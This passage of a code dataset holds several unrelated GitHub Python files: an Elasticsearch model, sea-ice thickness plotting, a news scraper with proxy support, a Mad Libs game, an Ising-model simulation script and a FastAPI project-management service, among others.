f.write(f'{len(self.total_rewards)},{total_reward},{1 if did_ai_win else 0},{episode_leng},{difficulty},{stage_choice}')\n self.save_to()\n\nif __name__ == '__main__':\n Policy().start_train()","repo_name":"AndrewAXue/theultimatemelee","sub_path":"Policy.py","file_name":"Policy.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"33711778775","text":"from elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Document, Text, Integer, Keyword, Float, Object, connections\nfrom crawl.models.source import Source\n\nconnections.create_connection(hosts=[\"elasticsearch\"])\nclient = Elasticsearch(hosts=[\"elasticsearch\"])\n\n\nclass Listing(Document):\n identifier = Integer()\n name = Text()\n url = Text()\n price = Float()\n category = Keyword()\n image = Text()\n properties = Object()\n source_id = Integer()\n source_name = Keyword()\n source_url = Keyword()\n\n class Index:\n name = \"listings\"\n settings = {\n \"number_of_shards\": 2\n }\n\n @classmethod\n def on_create(cls, target, connection):\n new_object = cls()\n\n new_object.identifier = target.id\n new_object.name = target.name\n new_object.url = target.url\n new_object.price = target.price\n new_object.category = target.category\n new_object.image = target.image\n new_object.properties = target.properties\n new_object.source_id = target.source_id\n\n source = connection.execute(Source.__table__.select().where(Source.id == target.source_id)).first()\n\n new_object.source_name = source.name\n new_object.source_url = source.url\n\n new_object.save()\n\n @classmethod\n def on_update(cls, target):\n old_object = cls.search().query(\"match\", identifier=target.id).execute()[0]\n\n old_object.name = target.name\n old_object.url = target.url\n old_object.price = target.price\n old_object.category = target.category\n old_object.image = target.image\n old_object.properties = target.properties\n old_object.source_id = target.source_id\n\n old_object.save()\n\nListing.init()","repo_name":"ABPozharliev19/strypes-labs-2023-final","sub_path":"crawl/es.py","file_name":"es.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23797765041","text":"\nimport matplotlib, sys\n#matplotlib.use('Agg')\nfrom mpl_toolkits.basemap import Basemap\nimport numpy as np\nfrom pylab import *\nimport numpy.ma as ma\nimport xarray as xr\nimport pandas as pd\nfrom scipy.interpolate import griddata\nfrom netCDF4 import Dataset\nimport netCDF4 as nc4\nimport time\nimport dask.array as da\nimport sys\nimport os\nfrom glob import glob\nsys.path.append('../')\nimport common_functions as cF\ncF.reset_matplotlib()\n\n#---------- Define file paths --------------------\n\n#mapProj = Basemap(epsg=3411,resolution='l', llcrnrlon=269.26, llcrnrlat=45., urcrnrlon=95.34, urcrnrlat=45.37)\n#mapProj = Basemap(projection='npstere',boundinglat=56,lon_0=0, resolution='l', round=False )\nmapProj = Basemap(epsg=3411,resolution='l', llcrnrlon=279.26, llcrnrlat=48., urcrnrlon=100, urcrnrlat=55.37)\n\nbaseDataPath='/cooler/scratch1/aapetty/DataOutput/IS1/'\nconcDataPath='/cooler/scratch1/aapetty/Data/ICECONC/CDR/monthly/'\n\nrunStr='run3'\n\nfigPath='/cooler/scratch1/aapetty/Figures/IS1/'+runStr\n\nregion_mask, xptsI, yptsI = cF.get_region_mask_sect('../../AncData/', mapProj, xypts_return=1)\n#region_maskG = griddata((xptsI.flatten(), yptsI.flatten()), region_mask.flatten(), 
(xptsN, yptsN), method='nearest', rescale=True)\n\nregions=[10, 11, 12, 13, 15]\n\n# DATE INFO\nice_thicknessIS1s=[]\ndateStrs=[]\niceconcs=[]\n\n#----IS1\ncampaignStrs=['FM03', 'FM04', 'FM05', 'FM06', 'FM08']\nrunStr='run3'\nversionStr='vInt4'\nsnowVar='NPdist'\nsmoothingWindow=0\nresolution=25.\n\n\nfor campaignStr in campaignStrs:\n\t\n\tsavePathIS1=baseDataPath+'/'+runStr+'/'+campaignStr+'/products/'\n\n\tlabelStr=campaignStr+snowVar+'W'+str(smoothingWindow)+'_'+str(resolution)+'km_'+versionStr\n\n\tprint(labelStr)\n\txptsIS1, yptsIS1,lonsIS1, latsIS1,ice_thicknessIS1 = cF.getIS1gridded(savePathIS1, labelStr, mapProj)\n\n\tice_thicknessIS1=ma.masked_where(np.isnan(ice_thicknessIS1), ice_thicknessIS1)\n\tice_thicknessIS1=ma.masked_where(latsIS1>85.5, ice_thicknessIS1)\n\tice_thicknessIS1=ma.masked_where(~np.isin(region_mask, regions), ice_thicknessIS1)\n\n\tice_thicknessIS1s.append(ice_thicknessIS1)\n\t#xptsc, yptsc, iceconcT=cF.get_cdr_conc(concDataPath, mapProj, yearStr, mStr)\n\t#iceconcs.append(iceconcT)\n\n\n# add the mean\nice_thicknessIS1s.insert(0, ma.mean(ice_thicknessIS1s, axis=0))\n#dateStrs.append('Winter mean')\ncampaignStrs.insert(0, 'mean')\n\nminval=0\nmaxval=5\n\nfig, axs = plt.subplots(nrows=2, ncols=3, figsize=(6, 5.8))\n\ni=0\nfor i in range(size(campaignStrs)):\n\tax=axs.flatten()[i]\n\t#if i == 5:\n\t#\tax.set_visible(False)\n\t#else:\n\tsca(ax)\n\t#im1 = mapProj.contourf(xptsIS1 , yptsIS1, ice_thicknessIS1s[i], levels=np.arange(minval, maxval+0.05, 0.5), cmap=cm.viridis , vmin=minval, vmax=maxval,extend='both', shading='gouraud', edgecolors='None', zorder=4, rasterized=True)\n\tim1 = mapProj.contourf(xptsIS1 , yptsIS1, ice_thicknessIS1s[i], levels=np.arange(minval, maxval+0.1, 0.25), cmap=cm.cubehelix_r, vmin=minval, vmax=maxval, extend='both', shading='gouraud', edgecolors='None', zorder=4, rasterized=True)\n\t# lower colorbar bounds\n\tplt.clim(-0.3,5)\n\tmapProj.drawparallels(np.arange(90,-90,-10), linewidth = 0.25, zorder=10)\n\tmapProj.drawmeridians(np.arange(-180.,180.,30.), linewidth = 0.25, zorder=10)\n\n\tmapProj.fillcontinents(color='0.9',lake_color='grey', zorder=5)\n\tmapProj.drawcoastlines(linewidth=0.25, zorder=5)\n\tax.annotate('('+chr(97+i)+') '+campaignStrs[i], xy=(0.98, 0.935),xycoords='axes fraction', horizontalalignment='right', verticalalignment='bottom', fontsize=8, zorder=10)\n\t#im11 = mapProj.contour(xptsc , yptsc, iceconcs[i],levels=0.15, colors='k', linewidths=0.8, zorder=5, alpha=1)\n\tmeanP=str(np.around(ma.mean(ice_thicknessIS1s[i]), decimals=2))\n\tax.annotate('Mean: '+meanP+' m', xy=(0.98, 0.02), xycoords='axes fraction', verticalalignment='bottom', horizontalalignment='right',color='k')\n\n\n#ADD COLORBAR TO MAP\n\ncax = fig.add_axes([0.3, 0.08, 0.4, 0.03])\n\ncbar = colorbar(im1,cax=cax, orientation='horizontal', extend='both', use_gridspec=True)\ncbar.set_label('Sea ice thickness (m)', labelpad=2)\n\ncbar.set_ticks(np.arange(minval, maxval+1, 1))\n\n\nsubplots_adjust(bottom=0.12, left=0.01, top = 0.99, right=0.99, wspace=0.02, hspace=0.03)\nsavefig(figPath+'/icethicknessIS1'+labelStr+'.png', dpi=300)\n","repo_name":"akpetty/ICESat-2-sea-ice-thickness","sub_path":"Code/plotting/plot_gridded_icesat.py","file_name":"plot_gridded_icesat.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"16471966901","text":"#-*- coding:utf-8 -*-\n\nimport requests,random,json,re,os,xlwt,xlrd,time\nfrom hashlib import md5\nfrom bs4 import 
BeautifulSoup\nfrom multiprocessing import Pool\nfrom configobj import ConfigObj\nfrom xlrd import open_workbook\nfrom xlutils.copy import copy\nfrom urllib.parse import urlencode\nfrom requests.exceptions import RequestException\nfrom emailSend import Email\nfrom excelInfo import infoExcel\nfrom ipProxy import ip_infoIni\n\n# 读取config.ini文件\ncf = ConfigObj(\"config.ini\",encoding='UTF8')\n# 日期格式化\ndate = str(time.strftime('%Y-%m-%d', time.localtime(time.time())))\n\nlist= [\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"\n ]\n\n# 随机选择header\ndef get_random_header():\n headers={\n 'Host': getHeadValue('host'),\n 'User-Agent':random.choice(list),\n 'Referer': getHeadValue('referer')\n }\n return headers\n\ndef get_page_index(offset, keyword):\n data = {\n 'offset': offset,\n 'format': 'json',\n 'keyword': keyword,\n 'autoload': 'true',\n 'count': 20,\n 'cur_tab': 1,\n 'from':'search_tab'\n }\n # 读取代理ip信息\n ipProxys=isProxy()\n\n if ipProxys:\n proxies = {\n ipProxys[0][0]: ipProxys[0][0]+'://'+ipProxys[0][1]+':'+ipProxys[0][2]\n }\n # 字典类型转url请求参数\n # 这是ajax请求的网址,不要忘了问号\n url = getConfValue('url') + urlencode(data)\n try:\n # 使用代理\n if (getProxyValue('isproxy')=='True'):\n print('使用代理ip: ',ipProxys)\n response = requests.get(url, headers=get_random_header(), proxies=proxies)\n # 不使用代理\n else :\n response = requests.get(url, headers=get_random_header())\n if response.status_code == 200:\n return response.json()\n return None\n except RequestException:\n print(\"请求索引出错\")\n return None\n\ndef parse_page_index(html):\n page_json=[]\n page_datas = []\n datas = json.loads(html)\n #如果data在键名中\n if datas['data']:\n #迭代data字典中的数据\n dataList = datas['data']\n for item in dataList:\n if 'open_url' in 
item.keys():\n title = item['title']\n article_url = item['article_url']\n comment_count = item['comment_count']\n datetime = item['datetime']\n has_video = item['has_video']\n if date in datetime :\n page_json.append([str(datetime),str(title),str(comment_count),str(has_video),str(article_url)])\n page_datas.append([page_json])\n return page_datas\n\n# 数据请求获取网页数据\ndef get_page_detail(url):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n print(\"请求详情页出错\", url)\n return None\n\ndef save(page_data,filename):\n # print(page_data)\n for data in page_data:\n if data :\n infoExcel(data,filename)\n\ndef emailSend(filename):\n sender=getEmailValue('sender')\n mypass=getEmailValue('mypass')\n receiver=getEmailValue('receiver')\n keyword=getConfValue('keyword')\n res = Email(filename,sender,mypass,receiver,keyword)\n if res:\n print('邮件发送成功')\n else:\n print('邮件发送失败')\n\n#获取配置文件name对应值\ndef getConfValue(name):\n return cf['conf'][name]\ndef getHeadValue(name):\n return cf['head'][name]\ndef getProxyValue(name):\n return cf['proxy'][name]\ndef getEmailValue(name):\n return cf['email'][name]\n\ndef getDictDatas_FromFile(fs):\n lines = fs.readlines() # 按行读取\n data = [] # 定义一个空列表,用来接收每行数据\n for line in lines:\n list = line.strip(\"\\n\").split(\",\") # 用,号分隔,并去除换行符\n urls = {} # 定义一个空字典\n for item in list: # 获取list列表中的每一条数据\n temp = item.split(\":\",1) # 将list中每一条数据用 :号分隔1次\n urls[temp[0]] = temp[1] # 键-值对添加值 key = value\n data.append(urls)\n return data\n\ndef get_ips():\n result=[]\n flag = 'False'\n checkIpProxy = ['http', 'https']\n httpTxt = 'ip_http.txt'\n httpsTxt = 'ip_https.txt'\n try:\n # 随机获取http或者https\n checkIp = random.choice(checkIpProxy)\n # print(checkIp)\n if checkIp == 'http':\n try:\n fs = open(httpTxt, encoding='utf-8') # 打开文件\n ips = getDictDatas_FromFile(fs)\n result.append([checkIp,ips])\n return result\n except:\n try:\n fs = open(httpsTxt, encoding='utf-8') # 打开文件\n ips = getDictDatas_FromFile(fs)\n result.append([checkIp, ips])\n return result\n except:\n return None\n else:\n try:\n fs = open(httpsTxt, encoding='utf-8') # 打开文件\n ips = getDictDatas_FromFile(fs)\n result.append([checkIp,ips])\n return result\n except:\n try:\n fs = open(httpTxt, encoding='utf-8') # 打开文件\n ips = getDictDatas_FromFile(fs)\n result.append([checkIp, ips])\n return result\n except:\n return None\n return None\n except:\n return None\n\ndef isProxy():\n ipProxys=[]\n try:\n if (getProxyValue('isproxy')=='True'):\n # 获取代理ip信息\n result = get_ips()\n if result:\n httpType = result[0][0]\n ips = result[0][1]\n # print(httpType)\n try:\n ip = random.choice(ips)\n except:\n print('没有可用代理ip')\n return ipProxys\n for key in ip:\n # print(key)\n # print(ip[key])\n ipProxys.append([httpType,key,ip[key]])\n # print(\"代理ip: \",ipProxys)\n return ipProxys\n return ipProxys\n except:\n return ipProxys\n\n\ndef main(offset):\n time.sleep(3)\n #获得的是json形式返回的数据\n html = get_page_index(offset,getConfValue('keyword'))\n filename = getConfValue('titel') + date + '.xls'\n if html:\n data = json.dumps(html)\n page_datas = parse_page_index(data)\n for page_data in page_datas:\n if page_data:\n try:\n save(page_data,filename)\n except:\n continue\n\nif __name__ == '__main__':\n\n # 程序开始时间\n time_start = time.time()\n\n filename = getConfValue('titel') + date + '.xls'\n time.sleep(5)\n start = 1\n end = 20\n #构造一个list,设置offset参数,实现下滑加载请求\n groups = [x*20 for x in range(start, end+1)]\n pool = Pool()\n #需要执行的函数,可迭代对象\n pool.map(main, 
groups)\n # # 发送邮件\n emailSend(filename)\n\n # 程序结束时间\n time_end = time.time()\n print('耗时: '+str(time_end - time_start)+'秒')\n time.sleep(5)\n print('程序执行完成')","repo_name":"zzhong1991/getMessage_Python","sub_path":"getMessage_Python/venv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42321312076","text":"# coding=utf-8\n\"\"\"\n File name: quality_of_life.py\n Author: Łukasz Jędryczka\n Date created: 17/11/2018\n Python Version: 3.6\n\n Getting configuration from files defined in config directory.\n\"\"\"\nfrom config import common\n\n\nclass Configuration:\n def __init__(self):\n self.HOST = 'host'\n self.LANG = 'language'\n self.FORMAT = 'format'\n\n @staticmethod\n def __get_common(attribute):\n \"\"\"\n Getting attribute from common configuration file\n\n :param attribute: attribute name.\n :return: attribute value.\n \"\"\"\n return common.API_COMMON_CONFIG[attribute]\n\n def __get_host(self, dataset_code):\n \"\"\"\n Assemble url host. Format and language is defined in common configuration file\n\n :param dataset_code: name of database.\n :return: host main API url.\n \"\"\"\n host = self.__get_common(self.HOST) + '/' + self.__get_common(self.FORMAT) + '/' + \\\n self.__get_common(self.LANG) + '/' + dataset_code\n\n return host\n\n @staticmethod\n def __apply_filters(url, dataset_code):\n \"\"\"\n Getting filters from configuration files of dataset code\n\n :param url: url on which we want to apply filters.\n :param dataset_code: name of database.\n :return:\n \"\"\"\n if '?' not in url:\n url += '?'\n else:\n url += '&'\n for key in dataset_code.FILTERS:\n if isinstance(dataset_code.FILTERS[key], list):\n for value in dataset_code.FILTERS[key]:\n url += key + '=' + str(value) + '&'\n else:\n url += key + '=' + str(dataset_code.FILTERS[key]) + '&'\n url = url[0:-1]\n return url\n\n def get_url(self, dataset_code):\n \"\"\"\n Getting url to API based on common configuration file and data code filters\n\n :param dataset_code: name of database.\n :return: url with filetrs defined in configuration files.\n \"\"\"\n module = None\n for qol_param in common.QOL_PARAMS:\n if dataset_code in common.QOL_PARAMS[qol_param]:\n module = common.QOL_PARAMS[qol_param][dataset_code]\n break\n\n url = self.__get_host(dataset_code)\n url = self.__apply_filters(url, common)\n if module is not None:\n url = self.__apply_filters(url, module)\n\n return url\n\n @staticmethod\n def get_params_list():\n \"\"\"\n Getting parameters list from common configuration file\n\n :return: list with parameters list defined in common configuration file.\n \"\"\"\n return common.QOL_PARAMS\n\n @staticmethod\n def get_subparams_list(param_name = None):\n \"\"\"\n Getting sub parameters list from common configuration file\n\n :param param_name: parameter name.\n :return: list of sub parameters of this parameter, defined in common configuration file.\n \"\"\"\n if param_name is not None:\n return common.QOL_PARAMS[param_name]\n else:\n return None\n\n @staticmethod\n def get_value(key):\n \"\"\"\n Getting value of key in configuration file\n\n :param key: key of value we want to know\n :return: value of key in configuration file\n \"\"\"\n for qol_param in common.QOL_PARAMS:\n if key in common.QOL_PARAMS[qol_param]:\n return common.QOL_PARAMS[qol_param][key]\n\n @staticmethod\n def get_countries():\n \"\"\"\n Getting countries list\n :return: countries list\n \"\"\"\n return 
common.COUNTRIES\n\n @staticmethod\n def get_time_interval():\n \"\"\"\n Getting time interval\n :return: time interval\n \"\"\"\n return common.TIME_INTERVAL\n\n @staticmethod\n def get_number_of_features(key):\n \"\"\"\n Getting number of features\n :param key: param name\n :return: number of param features\n \"\"\"\n sum = 0\n for name, module in common.QOL_PARAMS[key].items():\n sum += module.LENGTH\n\n return sum\n","repo_name":"wookieJ/qli-countries","sub_path":"script/utils/config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42143629507","text":"# from rest_framework.permissions import BasePermission\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_403_FORBIDDEN\n\n\ndef is_owner(obj, request):\n if obj.owner != request.user:\n return Response(\n {\n 'error': 'You do not have permission to perform this action'\n },\n status=HTTP_403_FORBIDDEN\n )\n\n\n# class IsOwner(BasePermission):\n# def has_object_permission(self, request, view, obj):\n# return obj and obj.owner == request.user","repo_name":"eldorjonneymatov/kanban","sub_path":"taskmanagement/api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42781175645","text":"import numpy as np\nimport cv2\nimg1 = np.ones((480,640), dtype = np.uint8)*255\n\n#cv2.namedWindow(\"image1\", cv2.WINDOW_NORMAL)\n#cv2.imshow(\"image1\", img1)\n\n\nimg = cv2.imread(r'C:\\Users\\Maxim\\Desktop\\Faculty\\start\\artem.png')# ,0 for black-white\nheight, weight = img.shape[:2]\nprint(height, weight)\n#print(img)\n\n'''for x in range(weight):\n for y in range(height):\n if x%2==0 and y%2==0:\n img[y, x] = 0'''\n\nimg[height//2+20: height//2+40, weight//2-100:weight//2+10] = (255,255,0)\n\ncv2.imshow(\"image2\", img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"mkgs210/Computer_vision","sub_path":"les_1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21883512529","text":"def print_mes():\n print (\"\"\"Welcome to my game you will have much fun.You will be provided with a series of prompts to enter a word that satisfies the requested word type\n \n \"\"\")\n\n\ndef read_template(file_path):\n try:\n with open(file_path) as file:\n content=file.read()\n except FileNotFoundError :\n # raise FileNotFoundError('The path file not correct')\n return 'The path file not correct'\n return content.strip()\n\n\n\nimport re\n# import regex\n\ndef parse_template(template_string):\n text = tuple(re.findall('{(.*?)}',template_string)) \n # use tuble to convert [] to ()\n new_text = re.sub('{.*?}','{}',template_string)\n\n # print(text)\n # print(new_text)\n\n return new_text,text\n\ndef user_input(words):\n responses=[]\n\n for i in words:\n responses.append(input(f'insert a {i}:'))\n # print(responses)\n return(responses)\n\n\n\ndef merge(new_text,input_words):\n \n # Merging process : Replace the { } with the user input\n\n merged_text = new_text.format(*input_words)\n print (merged_text)\n return (merged_text)\n\ndef madlib_game():\n print_mes()\n read=read_template('assets/test.txt')\n parse_template(read)\n new_text,text=parse_template(read)\n input_words=user_input(text)\n 
merge(new_text,input_words)\n\nif __name__ == \"__main__\":\n # print(__name__)\n madlib_game()","repo_name":"Awonkhrais/madlib-cli","sub_path":"madlib_cli/madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9798292102","text":"n =1\nlista =[]\n\nwhile n != 0:\n n = int(input())\n for i in range(1, n + 1):\n lista.append(i)\n lista[i-1] = str(lista[i-1])\n i = i + i\n lista=' '.join(lista)\n if n!= 0: \n print(lista)\n lista =[]","repo_name":"gustavocruz-pereira/beecrowd-problems-python","sub_path":"Problems/Python/1146.py","file_name":"1146.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11287228707","text":"import sys\nimport random\nimport utils\nimport grid_ising as grid\nimport matplotlib.pyplot as plt\nfrom math import log, sqrt\n\nrandom.seed(None)\n\nif len(sys.argv) != 4:\n sys.exit(\"Usage: grid_cftp.py grid_dim step_size max_iters\")\n\ndim = int(sys.argv[1])\nshape = (dim, dim)\nstep_size = float(sys.argv[2])\nmax_iters = int(sys.argv[3])\n\nb_crit = log(1+sqrt(2)) / 2\nplt.xlim(right=(b_crit + step_size))\nplt.ylim(top=max_iters)\nbvals, bsteps = utils.simulate(grid.CFTP(grid.heat_bath_flip, shape, max_iters), step_size)\nplt.plot(bvals, bsteps, color=\"darkorange\", label=\"Heat bath\")\nplt.annotate(\n \"β={:.2f}\".format(bvals[-1]),\n xy=(bvals[-1], bsteps[-1]),\n textcoords=\"offset points\",\n xytext=(0,5),\n ha='right',\n color=\"darkorange\")\nbvals, bsteps = utils.simulate(grid.CFTP(grid.metropolis_flip, shape, max_iters), step_size)\nplt.plot(bvals, bsteps, color = \"steelblue\", label=\"Metropolis filter\")\nplt.annotate(\n \"β={:.2f}\".format(bvals[-1]),\n xy=(bvals[-1], bsteps[-1]),\n textcoords=\"offset points\",\n xytext=(0,15),\n ha='right',\n color=\"steelblue\")\nplt.xlabel(\"Temperature β\")\nplt.ylabel(\"Mixing time (in MC steps)\")\nplt.title(\"{:d}x{:d} grid Ising CFTP\".format(dim,dim))\nplt.axvline(x = b_crit, color = 'r', linestyle = '-', label=\"Critical β\")\nplt.annotate(\n \"β={:.2f}\".format(b_crit),\n xy=(b_crit, max_iters),\n textcoords=\"offset points\",\n xytext=(0, -15),\n ha='right',\n color=\"red\")\nplt.legend(loc=\"upper left\")\nplt.savefig(\"grid_cftp{:d}x{:d}.png\".format(dim,dim))\n","repo_name":"ucsb/kevinl-f22-dimap","sub_path":"python/grid_cftp.py","file_name":"grid_cftp.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42486922089","text":"import os\nimport shutil\nimport sys\nfrom typing import Optional, List\n\nfrom fastapi import HTTPException, UploadFile\nfrom icecream import ic\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import Session\n\nimport src.user.models as models_user\nimport src.user.schemas as schemas_user\nfrom src.base.service import CRUDBase\nfrom src.project import models\nfrom src.project import schemas\n\n\nclass CRUDProject(CRUDBase):\n def get_project_by_name(self, db_session: Session, project_name: str):\n return db_session.query(models.Project).filter(models.Project.name == project_name).first()\n\n def get_links_by_id_project(self, db_session: Session, project_id: int) -> Optional[schemas.Project_links_in_db]:\n return db_session.query(models.Project_link).filter(models.Project_link.id_project == project_id).all()\n\n def 
get_status_projects(self, db_session: Session, flag: bool) -> List[Optional[schemas.Project_base_in_db]]:\n        return db_session.query(models.Project).filter(models.Project.status == flag).all()\n\n    def get_team_project_by_project_id(self, db_session: Session, project_id: int) -> List[Optional[schemas_user.User]]:\n        \"\"\"\n        Returns the team lead and the development team of the project\n        :param db_session: DB session\n        :param project_id: project id\n        :return: the project team\n        \"\"\"\n        project_team = db_session.query(models_user.User).select_from(models.Project_team) \\\n            .join(models_user.User).filter(models.Project_team.project_id == project_id).all()\n        return project_team\n\n\n    def get_team_lead_project_by_project_id(self, db_session: Session, project_id: int) -> Optional[schemas_user.User]:\n        project_team_lead = db_session.query(models_user.User).select_from(models.Project). \\\n            join(models_user.User).filter(models.Project.id == project_id).first()\n        return project_team_lead\n\n\n    def get_user_project_by_user_id(self, db_session: Session, user_id: int) -> List[\n        \"Optional[schemas.Project_base_in_db]\"]:\n        project = db_session.query(models.Project_team).filter(models.Project_team.user_id == user_id).all()\n        user_projects = []\n        for i in project:\n            user_projects.append(db_session.query(models.Project).filter(models.Project.id == i.project_id).first())\n        return user_projects\n\n    def get_file_by_id(self, db_session: Session, file_id: int):\n        return db_session.query(models.Project_file).filter(models.Project_file.id == file_id).first()\n\n    def get_files_project_by_project_id(self, db_session: Session, project_id: int) -> List[\n        Optional[schemas.Project_files_in_db]]:\n        return db_session.query(models.Project_file).filter(models.Project_file.id_project == project_id).all()\n\n    def path_validation(self, project_name: str):\n        root_dir = os.path.dirname(sys.modules['__main__'].__file__)\n        if os.path.exists(f\"{root_dir}\\\projects\"):\n            pass\n        else:\n            os.mkdir(f\"{root_dir}\\\projects\")\n\n        if os.path.exists(f\"{root_dir}\\\projects\\\{project_name}\"):\n            pass\n        else:\n            os.mkdir(f\"{root_dir}\\\projects\\\{project_name}\")\n        path_project = f\"{root_dir}\\\projects\\\{project_name}\"\n        return path_project\n\n    def create(self, db_session: Session, obj_in: schemas.Project_create, files: list = None) -> Optional[\n        schemas.Project_base_in_db]:\n        try:\n            project = models.Project(name=obj_in.name, customer=obj_in.customer,\n                                     project_start=obj_in.project_start, project_completion=obj_in.project_completion,\n                                     description=obj_in.description, path_design_documents=obj_in.path_design_documents,\n                                     team_lead=obj_in.team_lead, status=True)\n            db_session.add(project)\n            db_session.flush()\n            project_id = self.get_project_by_name(db_session, obj_in.name)\n\n            db_session.query(models_user.User).filter(models_user.User.id == obj_in.team_lead). \\\n                update({models_user.User.busy_status: True})\n\n            for i in obj_in.team:\n                db_session.query(models_user.User).filter(models_user.User.id == i). 
\\\n                    update({models_user.User.busy_status: True})\n                team_project = models.Project_team(project_id=project_id.id, user_id=i)\n                db_session.add(team_project)\n            db_session.commit()\n            return project\n        except Exception as ex:\n            db_session.rollback()\n            raise HTTPException(status_code=400, detail=f\"{ex.args}\")\n\n    def update_by_project_id(self, db_session: Session, obj_in: schemas.Project_update, project_id: int) -> Optional[\n        schemas.Project_update]:\n        try:\n            db_session.query(models.Project).filter(models.Project.id == project_id).update({\n                models.Project.name: obj_in.name, models.Project.customer: obj_in.customer,\n                models.Project.project_start: obj_in.project_start,\n                models.Project.project_completion: obj_in.project_completion,\n                models.Project.description: obj_in.description,\n                models.Project.path_design_documents: obj_in.path_design_documents,\n                models.Project.team_lead: obj_in.team_lead})\n            db_session.flush()\n            for i in obj_in.team:\n                team_project = models.Project_team(project_id=project_id, user_id=i)\n                db_session.add(team_project)\n            db_session.commit()\n            return obj_in\n        except IntegrityError as ex:\n            db_session.rollback()\n            raise HTTPException(status_code=400,\n                                detail=f\"The id of the user you want to add to the team was not found\\n{ex}\")\n\n    def closing_project_by_id(self, db_session: Session, project_id: int) -> Optional[schemas.Project_base_in_db]:\n        try:\n            db_session.query(models.Project).filter(models.Project.id == project_id). \\\n                update({models.Project.status: False})\n            db_session.flush()\n            project_team = self.get_team_project_by_project_id(db_session, project_id)\n            for user in project_team[1:]:\n                ic(user.id)\n                db_session.query(models_user.User).filter(models_user.User.id == user.id). \\\n                    update({models_user.User.busy_status: False})\n            db_session.commit()\n        except Exception as ex:\n            ic(ex)\n            db_session.rollback()\n\n    def add_links_project(self, db_session: Session, obj_in: schemas.Project_links, project_id: int):\n        for i in obj_in:\n            req = models.Project_link(id_project=project_id, link=i.link, description=i.description)\n            db_session.add(req)\n            db_session.commit()\n            db_session.refresh(req)\n\n    def delete_link(self, db_session: Session, project_id: int, link_id: int):\n        req = db_session.query(models.Project_link).filter(models.Project_link.id_project == project_id,\n                                                           models.Project_link.id == link_id).first()\n        db_session.delete(req)\n        db_session.commit()\n\n    def file_validator(self, db_session: Session, file_name: str):\n        return db_session.query(models.Project_file).filter(models.Project_file.file_name == file_name).first()\n\n    def add_files_project_by_project_id(self, db_session: Session, project_id: int, 